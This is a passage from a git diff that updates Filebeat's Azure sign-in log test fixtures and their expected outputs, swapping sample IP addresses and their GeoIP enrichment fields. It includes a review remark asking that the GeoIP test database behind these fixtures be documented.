LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
 "event.outcome": "failure",
 "event.type": [
 "info"
@@ -147,24 +143,20 @@
 "geo.location.lon": 2.12341234,
 "input.type": "log",
 "log.level": "4",
- "log.offset": 1688,
+ "log.offset": 1684,
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "related.ip": [
- "81.171.241.231"
+ "67.43.156.12"
 ],
 "service.type": "azure",
- "source.address": "81.171.241.231",
- "source.as.number": 8426,
- "source.as.organization.name": "Claranet Ltd",
- "source.geo.city_name": "Farnham Royal",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5333,
- "source.geo.location.lon": -0.6167,
- "source.geo.region_iso_code": "GB-BKM",
- "source.geo.region_name": "Buckinghamshire",
- "source.ip": "81.171.241.231",
+ "source.address": "67.43.156.12",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "forwarded"
 ],
@@ -326,7 +318,7 @@ "event.id": "a9222177-db03-40ef-9b86-5b207ed72000", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce Verification on External 
Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft 
Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for 
admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce Verification on External Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: 
JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}", "event.outcome": "success", "event.type": [ "info" 
@@ -339,7 +331,7 @@ "geo.location.lon": -100.26722717285156, "input.type": "log", "log.level": "4", - "log.offset": 3390, + "log.offset": 3389, "related.ip": [ "192.168.108.29" ], diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log index 5531742794bb..2a1a461071f5 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log +++ b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log 
@@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate 
Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange 
Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} +{"Level":4,"callerIpAddress":"216.160.83.61","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device 
Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop 
clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"216.160.83.61","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"} 
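Review bot: The replacement address 216.160.83.61 is a routable public address rather than one from the RFC 5737 documentation ranges, and the fixture still carries `"location":"DE"` and `"countryOrRegion":"DE"` while the expected output in the `@@ -189,16 +189,20 @@` hunk now enriches the same event as Milton, US-WA. That mismatch is presumably intentional because the address resolves in a fixed GeoIP test database the module tests run against, but nothing in the diff says so. A one-line remark in the PR description, or a short README beside the fixtures, naming that database and that source.geo values are expected to disagree with the Azure-reported location would keep the next fixture author from picking an address whose enrichment drifts with a production GeoLite2 update, which the removed 11.22.33.44/FR values appear to have done. The same point applies to the test-service-principal.log hunk that follows.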
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json index a2d74cd86d04..2787dd45a969 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log-expected.json @@ -163,7 +163,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "0", "azure.tenant_id": "22222222-902d-4dea-8026-5a790862fede", - "client.ip": "11.22.33.44", + "client.ip": "216.160.83.61", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ 
@@ -174,7 +174,7 @@ "event.id": "22222222-fb7b-4f83-bf74-3876f9ef3900", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA f\u00fcr G\u00e4ste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for 
Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD 
joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"216.160.83.61\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in 
